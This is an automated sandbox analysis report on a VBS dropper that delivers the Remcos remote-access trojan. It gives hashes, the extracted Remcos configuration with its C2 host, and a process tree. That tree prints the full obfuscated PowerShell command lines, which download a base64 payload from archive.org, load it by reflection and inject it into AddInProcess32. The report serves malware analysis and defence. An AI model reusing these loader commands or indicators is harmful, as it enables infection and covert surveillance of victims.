Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/09/2024, 14:05

General

  • Target

    Label_PL001292992.vbs

  • Size

    509KB

  • MD5

    2ed45f6abaeb502d6ff4d23237566c94

  • SHA1

    d284892891b5f51bc38225e9e5facbbaaff5e714

  • SHA256

    cfe9d1eca804cfb9d54224474dd7e71a2ee2b19d3b721728bd9e8ec326c5594f

  • SHA512

    4e2ef24f5bd791fb9e457c17f7224358bf2c34d4831b1af4929d3f144284ac52c1828b6c4df2342738e878ba80e80a16ec18592fab258ddd8e6c1fd143f0bfaa

  • SSDEEP

    12288:ZFQtuemF7ZN1OFvOuozQnL8ZoaoBIonqqzUSOEUDYTXnnvxwKt+MmBsHHG6LiF/O:CNNwqunWp

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

Family

remcos

Botnet

RemoteHost

C2

remcosco222.duckdns.org:7877

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-FX5B2Y

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Label_PL001292992.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3248
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTVFJJbmddJFZFUkJPU0VQckVGZXJlbmNFKVsxLDNdKydYJy1qT2lOJycpICgoJ3UnKydobHVybCA9ICcrJ1QnKydObGh0JysndHBzOi8nKycvJysnaWE2MCcrJzAxMDAuJysndXMuJysnYScrJ3JjaGl2ZS5vcmcnKycvMjQvaScrJ3RlbXMvZGUnKyd0YWgtbicrJ290JysnZScrJy12JysnL0RldGFoJysnTicrJ290ZVYudHh0VE5sOycrJ3VobGInKydhc2U2NENvbnRlJysnbicrJ3QnKycgPSAoTmUnKyd3LU9iamVjdCBTJysneXN0ZW0uTmV0LldlYkNsJysnaWVuJysndCkuRG8nKyd3bmxvJysnYScrJ2RTJysndHJpbmcodWhsdXJsKTt1aGxiJysnaW5hcnlDb250ZW50ID0gJysnW1N5c3RlJysnbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluJysnZygnKyd1aGxiYXMnKydlNjRDb250ZW4nKyd0KTt1aGxhc3NlJysnbWJseSA9IFtSZWZsZWN0aW9uJysnLkFzc2VtYicrJ2wnKyd5XTo6TG9hZCh1aGwnKydiaW5hcicrJ3lDb250JysnZScrJ250KTt1JysnaGx0JysneXAnKydlID0gdWhsYXNzZW0nKydibHkuRycrJ2V0VCcrJ3lwZSgnKydUTmxSdScrJ25QRScrJy5Ib21lJysnVE5sKTt1JysnaGxtZXRob2QgPSB1aGwnKyd0eXBlJysnLkcnKydldE1ldGhvJysnZCcrJyhUJysnTmwnKydWQUlUTicrJ2wpO3VobG1lJysndGhvZC5JJysnbnZva2UoJysndWhsbnVsbCwgW29iaicrJ2VjJysndFtdXUAoVE5sMCcrJy9CeHlvJysnQi9kL2VlLicrJ2V0cycrJ2FwLy86c3B0dGgnKydUTmwgLCBUTmxkZXNhdGl2YWRvVE5sICwnKycgVE5sZGVzYXRpdicrJ2Fkb1RObCAsJysnICcrJ1RObGQnKydlc2F0aXZhZG8nKydUTmwsJysnVE5sQWRkSW5Qcm9jZScrJ3NzMzInKydUTmwsVE5sVE5sKSknKS5yZXBMYWNFKChbY2hBcl04NCtbY2hBcl03OCtbY2hBcl0xMDgpLFtzdHJJTmddW2NoQXJdMzkpLnJlcExhY0UoJ3VobCcsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([STRIng]$VERBOSEPrEFerencE)[1,3]+'X'-jOiN'') (('u'+'hlurl = '+'T'+'Nlht'+'tps:/'+'/'+'ia60'+'0100.'+'us.'+'a'+'rchive.org'+'/24/i'+'tems/de'+'tah-n'+'ot'+'e'+'-v'+'/Detah'+'N'+'oteV.txtTNl;'+'uhlb'+'ase64Conte'+'n'+'t'+' = (Ne'+'w-Object S'+'ystem.Net.WebCl'+'ien'+'t).Do'+'wnlo'+'a'+'dS'+'tring(uhlurl);uhlb'+'inaryContent = '+'[Syste'+'m.Convert]::FromBase64Strin'+'g('+'uhlbas'+'e64Conten'+'t);uhlasse'+'mbly = [Reflection'+'.Assemb'+'l'+'y]::Load(uhl'+'binar'+'yCont'+'e'+'nt);u'+'hlt'+'yp'+'e = uhlassem'+'bly.G'+'etT'+'ype('+'TNlRu'+'nPE'+'.Home'+'TNl);u'+'hlmethod = uhl'+'type'+'.G'+'etMetho'+'d'+'(T'+'Nl'+'VAITN'+'l);uhlme'+'thod.I'+'nvoke('+'uhlnull, [obj'+'ec'+'t[]]@(TNl0'+'/Bxyo'+'B/d/ee.'+'ets'+'ap//:sptth'+'TNl , TNldesativadoTNl ,'+' TNldesativ'+'adoTNl ,'+' '+'TNld'+'esativado'+'TNl,'+'TNlAddInProce'+'ss32'+'TNl,TNlTNl))').repLacE(([chAr]84+[chAr]78+[chAr]108),[strINg][chAr]39).repLacE('uhl','$'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1220
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:4328
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3812

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      50a8221b93fbd2628ac460dd408a9fc1

      SHA1

      7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

      SHA256

      46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

      SHA512

      27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pafjna1s.r1t.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1220-24-0x000001FB68DD0000-0x000001FB68FDC000-memory.dmp

      Filesize

      2.0MB

    • memory/2352-32-0x00007FFF9DFB0000-0x00007FFF9EA71000-memory.dmp

      Filesize

      10.8MB

    • memory/2352-0-0x00007FFF9DFB3000-0x00007FFF9DFB5000-memory.dmp

      Filesize

      8KB

    • memory/2352-23-0x00007FFF9DFB0000-0x00007FFF9EA71000-memory.dmp

      Filesize

      10.8MB

    • memory/2352-12-0x00007FFF9DFB0000-0x00007FFF9EA71000-memory.dmp

      Filesize

      10.8MB

    • memory/2352-22-0x00007FFF9DFB3000-0x00007FFF9DFB5000-memory.dmp

      Filesize

      8KB

    • memory/2352-11-0x00007FFF9DFB0000-0x00007FFF9EA71000-memory.dmp

      Filesize

      10.8MB

    • memory/2352-6-0x00000234BB950000-0x00000234BB972000-memory.dmp

      Filesize

      136KB

    • memory/3812-35-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-40-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-33-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-34-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-25-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-36-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-37-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-28-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-41-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-42-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-43-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-44-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-45-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-46-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/3812-47-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB